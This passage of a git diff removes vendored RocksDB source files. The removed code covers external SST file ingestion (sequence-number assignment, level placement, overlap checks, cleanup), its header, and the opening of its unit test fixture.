-    status = Status::InvalidArgument("External file requires flush");
-  }
-  return status;
-}
-
-// REQUIRES: we have become the only writer by entering both write_thread_ and
-// nonmem_write_thread_
-Status ExternalSstFileIngestionJob::Run() {
-  Status status;
-#ifndef NDEBUG
-  // We should never run the job with a memtable that is overlapping
-  // with the files we are ingesting
-  bool need_flush = false;
-  status = NeedsFlush(&need_flush);
-  assert(status.ok() && need_flush == false);
-#endif
-
-  bool consumed_seqno = false;
-  bool force_global_seqno = false;
-
-  if (ingestion_options_.snapshot_consistency && !db_snapshots_->empty()) {
-    // We need to assign a global sequence number to all the files even
-    // if the dont overlap with any ranges since we have snapshots
-    force_global_seqno = true;
-  }
-  // It is safe to use this instead of LastToBeWrittenSequence since we are
-  // the only active writer, and hence they are equal
-  const SequenceNumber last_seqno = versions_->LastSequence();
-  SuperVersion* super_version = cfd_->GetSuperVersion();
-  edit_.SetColumnFamily(cfd_->GetID());
-  // The levels that the files will be ingested into
-
-  for (IngestedFileInfo& f : files_to_ingest_) {
-    SequenceNumber assigned_seqno = 0;
-    if (ingestion_options_.ingest_behind) {
-      status = CheckLevelForIngestedBehindFile(&f);
-    } else {
-      status = AssignLevelAndSeqnoForIngestedFile(
-         super_version, force_global_seqno, cfd_->ioptions()->compaction_style,
-         &f, &assigned_seqno);
-    }
-    if (!status.ok()) {
-      return status;
-    }
-    status = AssignGlobalSeqnoForIngestedFile(&f, assigned_seqno);
-    TEST_SYNC_POINT_CALLBACK("ExternalSstFileIngestionJob::Run",
-                             &assigned_seqno);
-    if (assigned_seqno == last_seqno + 1) {
-      consumed_seqno = true;
-    }
-    if (!status.ok()) {
-      return status;
-    }
-    edit_.AddFile(f.picked_level, f.fd.GetNumber(), f.fd.GetPathId(),
-                  f.fd.GetFileSize(), f.smallest_internal_key(),
-                  f.largest_internal_key(), f.assigned_seqno, f.assigned_seqno,
-                  false);
-  }
-
-  if (consumed_seqno) {
-    versions_->SetLastToBeWrittenSequence(last_seqno + 1);
-    versions_->SetLastSequence(last_seqno + 1);
-  }
-
-  return status;
-}
-
-void ExternalSstFileIngestionJob::UpdateStats() {
-  // Update internal stats for new ingested files
-  uint64_t total_keys = 0;
-  uint64_t total_l0_files = 0;
-  uint64_t total_time = env_->NowMicros() - job_start_time_;
-  for (IngestedFileInfo& f : files_to_ingest_) {
-    InternalStats::CompactionStats stats(1);
-    stats.micros = total_time;
-    stats.bytes_written = f.fd.GetFileSize();
-    stats.num_output_files = 1;
-    cfd_->internal_stats()->AddCompactionStats(f.picked_level, stats);
-    cfd_->internal_stats()->AddCFStats(InternalStats::BYTES_INGESTED_ADD_FILE,
-                                       f.fd.GetFileSize());
-    total_keys += f.num_entries;
-    if (f.picked_level == 0) {
-      total_l0_files += 1;
-    }
-    ROCKS_LOG_INFO(
-        db_options_.info_log,
-        "[AddFile] External SST file %s was ingested in L%d with path %s "
-        "(global_seqno=%" PRIu64 ")\n",
-        f.external_file_path.c_str(), f.picked_level,
-        f.internal_file_path.c_str(), f.assigned_seqno);
-  }
-  cfd_->internal_stats()->AddCFStats(InternalStats::INGESTED_NUM_KEYS_TOTAL,
-                                     total_keys);
-  cfd_->internal_stats()->AddCFStats(InternalStats::INGESTED_NUM_FILES_TOTAL,
-                                     files_to_ingest_.size());
-  cfd_->internal_stats()->AddCFStats(
-      InternalStats::INGESTED_LEVEL0_NUM_FILES_TOTAL, total_l0_files);
-}
-
-void ExternalSstFileIngestionJob::Cleanup(const Status& status) {
-  if (!status.ok()) {
-    // We failed to add the files to the database
-    // remove all the files we copied
-    for (IngestedFileInfo& f : files_to_ingest_) {
-      Status s = env_->DeleteFile(f.internal_file_path);
-      if (!s.ok()) {
-        ROCKS_LOG_WARN(db_options_.info_log,
-                       "AddFile() clean up for file %s failed : %s",
-                       f.internal_file_path.c_str(), s.ToString().c_str());
-      }
-    }
-  } else if (status.ok() && ingestion_options_.move_files) {
-    // The files were moved and added successfully, remove original file links
-    for (IngestedFileInfo& f : files_to_ingest_) {
-      Status s = env_->DeleteFile(f.external_file_path);
-      if (!s.ok()) {
-        ROCKS_LOG_WARN(
-            db_options_.info_log,
-            "%s was added to DB successfully but failed to remove original "
-            "file link : %s",
-            f.external_file_path.c_str(), s.ToString().c_str());
-      }
-    }
-  }
-}
-
-Status ExternalSstFileIngestionJob::GetIngestedFileInfo(
-    const std::string& external_file, IngestedFileInfo* file_to_ingest) {
-  file_to_ingest->external_file_path = external_file;
-
-  // Get external file size
-  Status status = env_->GetFileSize(external_file, &file_to_ingest->file_size);
-  if (!status.ok()) {
-    return status;
-  }
-
-  // Create TableReader for external file
-  std::unique_ptr<TableReader> table_reader;
-  std::unique_ptr<RandomAccessFile> sst_file;
-  std::unique_ptr<RandomAccessFileReader> sst_file_reader;
-
-  status = env_->NewRandomAccessFile(external_file, &sst_file, env_options_);
-  if (!status.ok()) {
-    return status;
-  }
-  sst_file_reader.reset(new RandomAccessFileReader(std::move(sst_file),
-                                                   external_file));
-
-  status = cfd_->ioptions()->table_factory->NewTableReader(
-      TableReaderOptions(*cfd_->ioptions(), env_options_,
-                         cfd_->internal_comparator()),
-      std::move(sst_file_reader), file_to_ingest->file_size, &table_reader);
-  if (!status.ok()) {
-    return status;
-  }
-
-  // Get the external file properties
-  auto props = table_reader->GetTableProperties();
-  const auto& uprops = props->user_collected_properties;
-
-  // Get table version
-  auto version_iter = uprops.find(ExternalSstFilePropertyNames::kVersion);
-  if (version_iter == uprops.end()) {
-    return Status::Corruption("External file version not found");
-  }
-  file_to_ingest->version = DecodeFixed32(version_iter->second.c_str());
-
-  auto seqno_iter = uprops.find(ExternalSstFilePropertyNames::kGlobalSeqno);
-  if (file_to_ingest->version == 2) {
-    // version 2 imply that we have global sequence number
-    if (seqno_iter == uprops.end()) {
-      return Status::Corruption(
-          "External file global sequence number not found");
-    }
-
-    // Set the global sequence number
-    file_to_ingest->original_seqno = DecodeFixed64(seqno_iter->second.c_str());
-    file_to_ingest->global_seqno_offset = props->properties_offsets.at(
-        ExternalSstFilePropertyNames::kGlobalSeqno);
-
-    if (file_to_ingest->global_seqno_offset == 0) {
-      return Status::Corruption("Was not able to find file global seqno field");
-    }
-  } else if (file_to_ingest->version == 1) {
-    // SST file V1 should not have global seqno field
-    assert(seqno_iter == uprops.end());
-    file_to_ingest->original_seqno = 0;
-    if (ingestion_options_.allow_blocking_flush ||
-            ingestion_options_.allow_global_seqno) {
-      return Status::InvalidArgument(
-            "External SST file V1 does not support global seqno");
-    }
-  } else {
-    return Status::InvalidArgument("External file version is not supported");
-  }
-  // Get number of entries in table
-  file_to_ingest->num_entries = props->num_entries;
-
-  ParsedInternalKey key;
-  ReadOptions ro;
-  // During reading the external file we can cache blocks that we read into
-  // the block cache, if we later change the global seqno of this file, we will
-  // have block in cache that will include keys with wrong seqno.
-  // We need to disable fill_cache so that we read from the file without
-  // updating the block cache.
-  ro.fill_cache = false;
-  std::unique_ptr<InternalIterator> iter(table_reader->NewIterator(ro));
-
-  // Get first (smallest) key from file
-  iter->SeekToFirst();
-  if (!ParseInternalKey(iter->key(), &key)) {
-    return Status::Corruption("external file have corrupted keys");
-  }
-  if (key.sequence != 0) {
-    return Status::Corruption("external file have non zero sequence number");
-  }
-  file_to_ingest->smallest_user_key = key.user_key.ToString();
-
-  // Get last (largest) key from file
-  iter->SeekToLast();
-  if (!ParseInternalKey(iter->key(), &key)) {
-    return Status::Corruption("external file have corrupted keys");
-  }
-  if (key.sequence != 0) {
-    return Status::Corruption("external file have non zero sequence number");
-  }
-  file_to_ingest->largest_user_key = key.user_key.ToString();
-
-  file_to_ingest->cf_id = static_cast<uint32_t>(props->column_family_id);
-
-  file_to_ingest->table_properties = *props;
-
-  return status;
-}
-
-Status ExternalSstFileIngestionJob::IngestedFilesOverlapWithMemtables(
-    SuperVersion* sv, bool* overlap) {
-  // Create an InternalIterator over all memtables
-  Arena arena;
-  ReadOptions ro;
-  ro.total_order_seek = true;
-  MergeIteratorBuilder merge_iter_builder(&cfd_->internal_comparator(), &arena);
-  merge_iter_builder.AddIterator(sv->mem->NewIterator(ro, &arena));
-  sv->imm->AddIterators(ro, &merge_iter_builder);
-  ScopedArenaIterator memtable_iter(merge_iter_builder.Finish());
-
-  std::vector<InternalIterator*> memtable_range_del_iters;
-  auto* active_range_del_iter = sv->mem->NewRangeTombstoneIterator(ro);
-  if (active_range_del_iter != nullptr) {
-    memtable_range_del_iters.push_back(active_range_del_iter);
-  }
-  sv->imm->AddRangeTombstoneIterators(ro, &memtable_range_del_iters);
-  std::unique_ptr<InternalIterator> memtable_range_del_iter(NewMergingIterator(
-      &cfd_->internal_comparator(),
-      memtable_range_del_iters.empty() ? nullptr : &memtable_range_del_iters[0],
-      static_cast<int>(memtable_range_del_iters.size())));
-
-  Status status;
-  *overlap = false;
-  for (IngestedFileInfo& f : files_to_ingest_) {
-    status =
-        IngestedFileOverlapWithIteratorRange(&f, memtable_iter.get(), overlap);
-    if (!status.ok() || *overlap == true) {
-      break;
-    }
-    status = IngestedFileOverlapWithRangeDeletions(
-        &f, memtable_range_del_iter.get(), overlap);
-    if (!status.ok() || *overlap == true) {
-      break;
-    }
-  }
-
-  return status;
-}
-
-Status ExternalSstFileIngestionJob::AssignLevelAndSeqnoForIngestedFile(
-    SuperVersion* sv, bool force_global_seqno, CompactionStyle compaction_style,
-    IngestedFileInfo* file_to_ingest, SequenceNumber* assigned_seqno) {
-  Status status;
-  *assigned_seqno = 0;
-  const SequenceNumber last_seqno = versions_->LastSequence();
-  if (force_global_seqno) {
-    *assigned_seqno = last_seqno + 1;
-    if (compaction_style == kCompactionStyleUniversal) {
-      file_to_ingest->picked_level = 0;
-      return status;
-    }
-  }
-
-  bool overlap_with_db = false;
-  Arena arena;
-  ReadOptions ro;
-  ro.total_order_seek = true;
-  int target_level = 0;
-  auto* vstorage = cfd_->current()->storage_info();
-
-  for (int lvl = 0; lvl < cfd_->NumberLevels(); lvl++) {
-    if (lvl > 0 && lvl < vstorage->base_level()) {
-      continue;
-    }
-
-    if (vstorage->NumLevelFiles(lvl) > 0) {
-      bool overlap_with_level = false;
-      status = IngestedFileOverlapWithLevel(sv, file_to_ingest, lvl,
-        &overlap_with_level);
-      if (!status.ok()) {
-        return status;
-      }
-      if (overlap_with_level) {
-        // We must use L0 or any level higher than `lvl` to be able to overwrite
-        // the keys that we overlap with in this level, We also need to assign
-        // this file a seqno to overwrite the existing keys in level `lvl`
-        overlap_with_db = true;
-        break;
-      }
-
-      if (compaction_style == kCompactionStyleUniversal && lvl != 0) {
-        const std::vector<FileMetaData*>& level_files =
-            vstorage->LevelFiles(lvl);
-        const SequenceNumber level_largest_seqno =
-            (*max_element(level_files.begin(), level_files.end(),
-                          [](FileMetaData* f1, FileMetaData* f2) {
-                            return f1->largest_seqno < f2->largest_seqno;
-                          }))
-                ->largest_seqno;
-        if (level_largest_seqno != 0) {
-          *assigned_seqno = level_largest_seqno;
-        } else {
-          continue;
-        }
-      }
-    } else if (compaction_style == kCompactionStyleUniversal) {
-      continue;
-    }
-
-    // We dont overlap with any keys in this level, but we still need to check
-    // if our file can fit in it
-    if (IngestedFileFitInLevel(file_to_ingest, lvl)) {
-      target_level = lvl;
-    }
-  }
- TEST_SYNC_POINT_CALLBACK(
-      "ExternalSstFileIngestionJob::AssignLevelAndSeqnoForIngestedFile",
-      &overlap_with_db);
-  file_to_ingest->picked_level = target_level;
-  if (overlap_with_db && *assigned_seqno == 0) {
-    *assigned_seqno = last_seqno + 1;
-  }
-  return status;
-}
-
-Status ExternalSstFileIngestionJob::CheckLevelForIngestedBehindFile(
-    IngestedFileInfo* file_to_ingest) {
-  auto* vstorage = cfd_->current()->storage_info();
-  // first check if new files fit in the bottommost level
-  int bottom_lvl = cfd_->NumberLevels() - 1;
-  if(!IngestedFileFitInLevel(file_to_ingest, bottom_lvl)) {
-    return Status::InvalidArgument(
-      "Can't ingest_behind file as it doesn't fit "
-      "at the bottommost level!");
-  }
-
-  // second check if despite allow_ingest_behind=true we still have 0 seqnums
-  // at some upper level
-  for (int lvl = 0; lvl < cfd_->NumberLevels() - 1; lvl++) {
-    for (auto file : vstorage->LevelFiles(lvl)) {
-      if (file->smallest_seqno == 0) {
-        return Status::InvalidArgument(
-          "Can't ingest_behind file as despite allow_ingest_behind=true "
-          "there are files with 0 seqno in database at upper levels!");
-      }
-    }
-  }
-
-  file_to_ingest->picked_level = bottom_lvl;
-  return Status::OK();
-}
-
-Status ExternalSstFileIngestionJob::AssignGlobalSeqnoForIngestedFile(
-    IngestedFileInfo* file_to_ingest, SequenceNumber seqno) {
-  if (file_to_ingest->original_seqno == seqno) {
-    // This file already have the correct global seqno
-    return Status::OK();
-  } else if (!ingestion_options_.allow_global_seqno) {
-    return Status::InvalidArgument("Global seqno is required, but disabled");
-  } else if (file_to_ingest->global_seqno_offset == 0) {
-    return Status::InvalidArgument(
-        "Trying to set global seqno for a file that dont have a global seqno "
-        "field");
-  }
-
-  std::unique_ptr<RandomRWFile> rwfile;
-  Status status = env_->NewRandomRWFile(file_to_ingest->internal_file_path,
-                                        &rwfile, env_options_);
-  if (!status.ok()) {
-    return status;
-  }
-
-  // Write the new seqno in the global sequence number field in the file
-  std::string seqno_val;
-  PutFixed64(&seqno_val, seqno);
-  status = rwfile->Write(file_to_ingest->global_seqno_offset, seqno_val);
-  if (status.ok()) {
-    file_to_ingest->assigned_seqno = seqno;
-  }
-  return status;
-}
-
-Status ExternalSstFileIngestionJob::IngestedFileOverlapWithIteratorRange(
-    const IngestedFileInfo* file_to_ingest, InternalIterator* iter,
-    bool* overlap) {
-  auto* vstorage = cfd_->current()->storage_info();
-  auto* ucmp = vstorage->InternalComparator()->user_comparator();
-  InternalKey range_start(file_to_ingest->smallest_user_key, kMaxSequenceNumber,
-                          kValueTypeForSeek);
-  iter->Seek(range_start.Encode());
-  if (!iter->status().ok()) {
-    return iter->status();
-  }
-
-  *overlap = false;
-  if (iter->Valid()) {
-    ParsedInternalKey seek_result;
-    if (!ParseInternalKey(iter->key(), &seek_result)) {
-      return Status::Corruption("DB have corrupted keys");
-    }
-
-    if (ucmp->Compare(seek_result.user_key, file_to_ingest->largest_user_key) <=
-        0) {
-      *overlap = true;
-    }
-  }
-
-  return iter->status();
-}
-
-Status ExternalSstFileIngestionJob::IngestedFileOverlapWithRangeDeletions(
-    const IngestedFileInfo* file_to_ingest, InternalIterator* range_del_iter,
-    bool* overlap) {
-  auto* vstorage = cfd_->current()->storage_info();
-  auto* ucmp = vstorage->InternalComparator()->user_comparator();
-
-  *overlap = false;
-  if (range_del_iter != nullptr) {
-    for (range_del_iter->SeekToFirst(); range_del_iter->Valid();
-         range_del_iter->Next()) {
-      ParsedInternalKey parsed_key;
-      if (!ParseInternalKey(range_del_iter->key(), &parsed_key)) {
-        return Status::Corruption("corrupted range deletion key: " +
-                                  range_del_iter->key().ToString());
-      }
-      RangeTombstone range_del(parsed_key, range_del_iter->value());
-      if (ucmp->Compare(range_del.start_key_,
-                        file_to_ingest->largest_user_key) <= 0 &&
-          ucmp->Compare(file_to_ingest->smallest_user_key,
-                        range_del.end_key_) <= 0) {
-        *overlap = true;
-        break;
-      }
-    }
-  }
-  return Status::OK();
-}
-
-bool ExternalSstFileIngestionJob::IngestedFileFitInLevel(
-    const IngestedFileInfo* file_to_ingest, int level) {
-  if (level == 0) {
-    // Files can always fit in L0
-    return true;
-  }
-
-  auto* vstorage = cfd_->current()->storage_info();
-  Slice file_smallest_user_key(file_to_ingest->smallest_user_key);
-  Slice file_largest_user_key(file_to_ingest->largest_user_key);
-
-  if (vstorage->OverlapInLevel(level, &file_smallest_user_key,
-                               &file_largest_user_key)) {
-    // File overlap with another files in this level, we cannot
-    // add it to this level
-    return false;
-  }
-  if (cfd_->RangeOverlapWithCompaction(file_smallest_user_key,
-                                       file_largest_user_key, level)) {
-    // File overlap with a running compaction output that will be stored
-    // in this level, we cannot add this file to this level
-    return false;
-  }
-
-  // File did not overlap with level files, our compaction output
-  return true;
-}
-
-Status ExternalSstFileIngestionJob::IngestedFileOverlapWithLevel(
-    SuperVersion* sv, IngestedFileInfo* file_to_ingest, int lvl,
-    bool* overlap_with_level) {
-  Arena arena;
-  ReadOptions ro;
-  ro.total_order_seek = true;
-  MergeIteratorBuilder merge_iter_builder(&cfd_->internal_comparator(),
-                                          &arena);
-  sv->current->AddIteratorsForLevel(ro, env_options_, &merge_iter_builder, lvl,
-                                    nullptr /* range_del_agg */);
-  ScopedArenaIterator level_iter(merge_iter_builder.Finish());
-
-  std::vector<InternalIterator*> level_range_del_iters;
-  sv->current->AddRangeDelIteratorsForLevel(ro, env_options_, lvl,
-                                            &level_range_del_iters);
-  std::unique_ptr<InternalIterator> level_range_del_iter(NewMergingIterator(
-      &cfd_->internal_comparator(),
-      level_range_del_iters.empty() ? nullptr : &level_range_del_iters[0],
-      static_cast<int>(level_range_del_iters.size())));
-
-  Status status = IngestedFileOverlapWithIteratorRange(
-      file_to_ingest, level_iter.get(), overlap_with_level);
-  if (status.ok() && *overlap_with_level == false) {
-    status = IngestedFileOverlapWithRangeDeletions(
-        file_to_ingest, level_range_del_iter.get(), overlap_with_level);
-  }
-  return status;
-}
-
-}  // namespace rocksdb
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/external_sst_file_ingestion_job.h b/thirdparty/rocksdb/db/external_sst_file_ingestion_job.h
deleted file mode 100644
index 2d0fade..0000000
--- a/thirdparty/rocksdb/db/external_sst_file_ingestion_job.h
+++ /dev/null
@@ -1,171 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#include <string>
-#include <unordered_set>
-#include <vector>
-
-#include "db/column_family.h"
-#include "db/dbformat.h"
-#include "db/internal_stats.h"
-#include "db/snapshot_impl.h"
-#include "options/db_options.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/sst_file_writer.h"
-#include "util/autovector.h"
-
-namespace rocksdb {
-
-struct IngestedFileInfo {
-  // External file path
-  std::string external_file_path;
-  // Smallest user key in external file
-  std::string smallest_user_key;
-  // Largest user key in external file
-  std::string largest_user_key;
-  // Sequence number for keys in external file
-  SequenceNumber original_seqno;
-  // Offset of the global sequence number field in the file, will
-  // be zero if version is 1 (global seqno is not supported)
-  size_t global_seqno_offset;
-  // External file size
-  uint64_t file_size;
-  // total number of keys in external file
-  uint64_t num_entries;
-  // Id of column family this file shoule be ingested into
-  uint32_t cf_id;
-  // TableProperties read from external file
-  TableProperties table_properties;
-  // Version of external file
-  int version;
-
-  // FileDescriptor for the file inside the DB
-  FileDescriptor fd;
-  // file path that we picked for file inside the DB
-  std::string internal_file_path = "";
-  // Global sequence number that we picked for the file inside the DB
-  SequenceNumber assigned_seqno = 0;
-  // Level inside the DB we picked for the external file.
-  int picked_level = 0;
-
-  InternalKey smallest_internal_key() const {
-    return InternalKey(smallest_user_key, assigned_seqno,
-                       ValueType::kTypeValue);
-  }
-
-  InternalKey largest_internal_key() const {
-    return InternalKey(largest_user_key, assigned_seqno, ValueType::kTypeValue);
-  }
-};
-
-class ExternalSstFileIngestionJob {
- public:
-  ExternalSstFileIngestionJob(
-      Env* env, VersionSet* versions, ColumnFamilyData* cfd,
-      const ImmutableDBOptions& db_options, const EnvOptions& env_options,
-      SnapshotList* db_snapshots,
-      const IngestExternalFileOptions& ingestion_options)
-      : env_(env),
-        versions_(versions),
-        cfd_(cfd),
-        db_options_(db_options),
-        env_options_(env_options),
-        db_snapshots_(db_snapshots),
-        ingestion_options_(ingestion_options),
-        job_start_time_(env_->NowMicros()) {}
-
-  // Prepare the job by copying external files into the DB.
-  Status Prepare(const std::vector<std::string>& external_files_paths);
-
-  // Check if we need to flush the memtable before running the ingestion job
-  // This will be true if the files we are ingesting are overlapping with any
-  // key range in the memtable.
-  // REQUIRES: Mutex held
-  Status NeedsFlush(bool* flush_needed);
-
-  // Will execute the ingestion job and prepare edit() to be applied.
-  // REQUIRES: Mutex held
-  Status Run();
-
-  // Update column family stats.
-  // REQUIRES: Mutex held
-  void UpdateStats();
-
-  // Cleanup after successful/failed job
-  void Cleanup(const Status& status);
-
-  VersionEdit* edit() { return &edit_; }
-
-  const autovector<IngestedFileInfo>& files_to_ingest() const {
-    return files_to_ingest_;
-  }
-
- private:
-  // Open the external file and populate `file_to_ingest` with all the
-  // external information we need to ingest this file.
-  Status GetIngestedFileInfo(const std::string& external_file,
-                             IngestedFileInfo* file_to_ingest);
-
-  // Check if the files we are ingesting overlap with any memtable.
-  // REQUIRES: Mutex held
-  Status IngestedFilesOverlapWithMemtables(SuperVersion* sv, bool* overlap);
-
-  // Assign `file_to_ingest` the appropriate sequence number and  the lowest
-  // possible level that it can be ingested to according to compaction_style.
-  // REQUIRES: Mutex held
-  Status AssignLevelAndSeqnoForIngestedFile(SuperVersion* sv,
-                                            bool force_global_seqno,
-                                            CompactionStyle compaction_style,
-                                            IngestedFileInfo* file_to_ingest,
-                                            SequenceNumber* assigned_seqno);
-
-  // File that we want to ingest behind always goes to the lowest level;
-  // we just check that it fits in the level, that DB allows ingest_behind,
-  // and that we don't have 0 seqnums at the upper levels.
-  // REQUIRES: Mutex held
-  Status CheckLevelForIngestedBehindFile(IngestedFileInfo* file_to_ingest);
-
-  // Set the file global sequence number to `seqno`
-  Status AssignGlobalSeqnoForIngestedFile(IngestedFileInfo* file_to_ingest,
-                                          SequenceNumber seqno);
-
-  // Check if `file_to_ingest` key range overlap with the range `iter` represent
-  // REQUIRES: Mutex held
-  Status IngestedFileOverlapWithIteratorRange(
-      const IngestedFileInfo* file_to_ingest, InternalIterator* iter,
-      bool* overlap);
-
-  // Check if `file_to_ingest` key range overlaps with any range deletions
-  // specified by `iter`.
-  // REQUIRES: Mutex held
-  Status IngestedFileOverlapWithRangeDeletions(
-      const IngestedFileInfo* file_to_ingest, InternalIterator* range_del_iter,
-      bool* overlap);
-
-  // Check if `file_to_ingest` key range overlap with level
-  // REQUIRES: Mutex held
-  Status IngestedFileOverlapWithLevel(SuperVersion* sv,
-    IngestedFileInfo* file_to_ingest, int lvl, bool* overlap_with_level);
-
-  // Check if `file_to_ingest` can fit in level `level`
-  // REQUIRES: Mutex held
-  bool IngestedFileFitInLevel(const IngestedFileInfo* file_to_ingest,
-                              int level);
-
-  Env* env_;
-  VersionSet* versions_;
-  ColumnFamilyData* cfd_;
-  const ImmutableDBOptions& db_options_;
-  const EnvOptions& env_options_;
-  SnapshotList* db_snapshots_;
-  autovector<IngestedFileInfo> files_to_ingest_;
-  const IngestExternalFileOptions& ingestion_options_;
-  VersionEdit edit_;
-  uint64_t job_start_time_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/external_sst_file_test.cc b/thirdparty/rocksdb/db/external_sst_file_test.cc
deleted file mode 100644
index 4a4e82e..0000000
--- a/thirdparty/rocksdb/db/external_sst_file_test.cc
+++ /dev/null
@@ -1,1961 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include <functional>
-#include "db/db_test_util.h"
-#include "port/port.h"
-#include "port/stack_trace.h"
-#include "rocksdb/sst_file_writer.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class ExternalSSTFileTest : public DBTestBase {
- public:
-  ExternalSSTFileTest() : DBTestBase("/external_sst_file_test") {
-    sst_files_dir_ = dbname_ + "/sst_files/";
-    DestroyAndRecreateExternalSSTFilesDir();
-  }
-
-  void DestroyAndRecreateExternalSSTFilesDir() {
-    test::DestroyDir(env_, sst_files_dir_);
-    env_->CreateDir(sst_files_dir_);
-  }
-
-  Status GenerateAndAddExternalFile(
-      const Options options,
-      std::vector<std::pair<std::string, std::string>> data, int file_id = -1,
-      bool allow_global_seqno = false, bool sort_data = false,
-      std::map<std::string, std::string>* true_data = nullptr,
-      ColumnFamilyHandle* cfh = nullptr) {
-    // Generate a file id if not provided
-    if (file_id == -1) {
-      file_id = last_file_id_ + 1;
-      last_file_id_++;
-    }
-
-    // Sort data if asked to do so
-    if (sort_data) {
-      std::sort(data.begin(), data.end(),
-                [&](const std::pair<std::string, std::string>& e1,
-                    const std::pair<std::string, std::string>& e2) {
-                  return options.comparator->Compare(e1.first, e2.first) < 0;
-                });
-      auto uniq_iter = std::unique(
-          data.begin(), data.end(),
-          [&](const std::pair<std::string, std::string>& e1,
-              const std::pair<std::string, std::string>& e2) {
-            return options.comparator->Compare(e1.first, e2.first) == 0;
-          });
-      data.resize(uniq_iter - data.begin());
-    }
-    std::string file_path = sst_files_dir_ + ToString(file_id);
-    SstFileWriter sst_file_writer(EnvOptions(), options, cfh);
-
-    Status s = sst_file_writer.Open(file_path);
-    if (!s.ok()) {
-      return s;
-    }
-    for (auto& entry : data) {
-      s = sst_file_writer.Put(entry.first, entry.second);
-      if (!s.ok()) {
-        sst_file_writer.Finish();
-        return s;
-      }
-    }
-    s = sst_file_writer.Finish();
-
-    if (s.ok()) {
-      IngestExternalFileOptions ifo;
-      ifo.allow_global_seqno = allow_global_seqno;
-      if (cfh) {
-        s = db_->IngestExternalFile(cfh, {file_path}, ifo);
-      } else {
-        s = db_->IngestExternalFile({file_path}, ifo);
-      }
-    }
-
-    if (s.ok() && true_data) {
-      for (auto& entry : data) {
-        (*true_data)[entry.first] = entry.second;
-      }
-    }
-
-    return s;
-  }
-
-  Status GenerateAndAddExternalFileIngestBehind(
-      const Options options, const IngestExternalFileOptions ifo,
-      std::vector<std::pair<std::string, std::string>> data, int file_id = -1,
-      bool sort_data = false,
-      std::map<std::string, std::string>* true_data = nullptr,
-      ColumnFamilyHandle* cfh = nullptr) {
-    // Generate a file id if not provided
-    if (file_id == -1) {
-      file_id = last_file_id_ + 1;
-      last_file_id_++;
-    }
-
-    // Sort data if asked to do so
-    if (sort_data) {
-      std::sort(data.begin(), data.end(),
-                [&](const std::pair<std::string, std::string>& e1,
-                    const std::pair<std::string, std::string>& e2) {
-                  return options.comparator->Compare(e1.first, e2.first) < 0;
-                });
-      auto uniq_iter = std::unique(
-          data.begin(), data.end(),
-          [&](const std::pair<std::string, std::string>& e1,
-              const std::pair<std::string, std::string>& e2) {
-            return options.comparator->Compare(e1.first, e2.first) == 0;
-          });
-      data.resize(uniq_iter - data.begin());
-    }
-    std::string file_path = sst_files_dir_ + ToString(file_id);
-    SstFileWriter sst_file_writer(EnvOptions(), options, cfh);
-
-    Status s = sst_file_writer.Open(file_path);
-    if (!s.ok()) {
-      return s;
-    }
-    for (auto& entry : data) {
-      s = sst_file_writer.Put(entry.first, entry.second);
-      if (!s.ok()) {
-        sst_file_writer.Finish();
-        return s;
-      }
-    }
-    s = sst_file_writer.Finish();
-
-    if (s.ok()) {
-      if (cfh) {
-        s = db_->IngestExternalFile(cfh, {file_path}, ifo);
-      } else {
-        s = db_->IngestExternalFile({file_path}, ifo);
-      }
-    }
-
-    if (s.ok() && true_data) {
-      for (auto& entry : data) {
-        (*true_data)[entry.first] = entry.second;
-      }
-    }
-
-    return s;
-  }
-
-
-
-  Status GenerateAndAddExternalFile(
-      const Options options, std::vector<std::pair<int, std::string>> data,
-      int file_id = -1, bool allow_global_seqno = false, bool sort_data = false,
-      std::map<std::string, std::string>* true_data = nullptr,
-      ColumnFamilyHandle* cfh = nullptr) {
-    std::vector<std::pair<std::string, std::string>> file_data;
-    for (auto& entry : data) {
-      file_data.emplace_back(Key(entry.first), entry.second);
-    }
-    return GenerateAndAddExternalFile(options, file_data, file_id,
-                                      allow_global_seqno, sort_data, true_data,
-                                      cfh);
-  }
-
-  Status GenerateAndAddExternalFile(
-      const Options options, std::vector<int> keys, int file_id = -1,
-      bool allow_global_seqno = false, bool sort_data = false,
-      std::map<std::string, std::string>* true_data = nullptr,
-      ColumnFamilyHandle* cfh = nullptr) {
-    std::vector<std::pair<std::string, std::string>> file_data;
-    for (auto& k : keys) {
-      file_data.emplace_back(Key(k), Key(k) + ToString(file_id));
-    }
-    return GenerateAndAddExternalFile(options, file_data, file_id,
-                                      allow_global_seqno, sort_data, true_data,
-                                      cfh);
-  }
-
-  Status DeprecatedAddFile(const std::vector<std::string>& files,
-                           bool move_files = false,
-                           bool skip_snapshot_check = false) {
-    IngestExternalFileOptions opts;
-    opts.move_files = move_files;
-    opts.snapshot_consistency = !skip_snapshot_check;
-    opts.allow_global_seqno = false;
-    opts.allow_blocking_flush = false;
-    return db_->IngestExternalFile(files, opts);
-  }
-
-  ~ExternalSSTFileTest() { test::DestroyDir(env_, sst_files_dir_); }
-
- protected:
-  int last_file_id_ = 0;
-  std::string sst_files_dir_;
-};
-
-TEST_F(ExternalSSTFileTest, Basic) {
-  do {
-    Options options = CurrentOptions();
-
-    SstFileWriter sst_file_writer(EnvOptions(), options);
-
-    // Current file size should be 0 after sst_file_writer init and before open a file.
-    ASSERT_EQ(sst_file_writer.FileSize(), 0);
-
-    // file1.sst (0 => 99)
-    std::string file1 = sst_files_dir_ + "file1.sst";
-    ASSERT_OK(sst_file_writer.Open(file1));
-    for (int k = 0; k < 100; k++) {
-      ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val"));
-    }
-    ExternalSstFileInfo file1_info;
-    Status s = sst_file_writer.Finish(&file1_info);
-    ASSERT_TRUE(s.ok()) << s.ToString();
-
-    // Current file size should be non-zero after success write.
-    ASSERT_GT(sst_file_writer.FileSize(), 0);
-
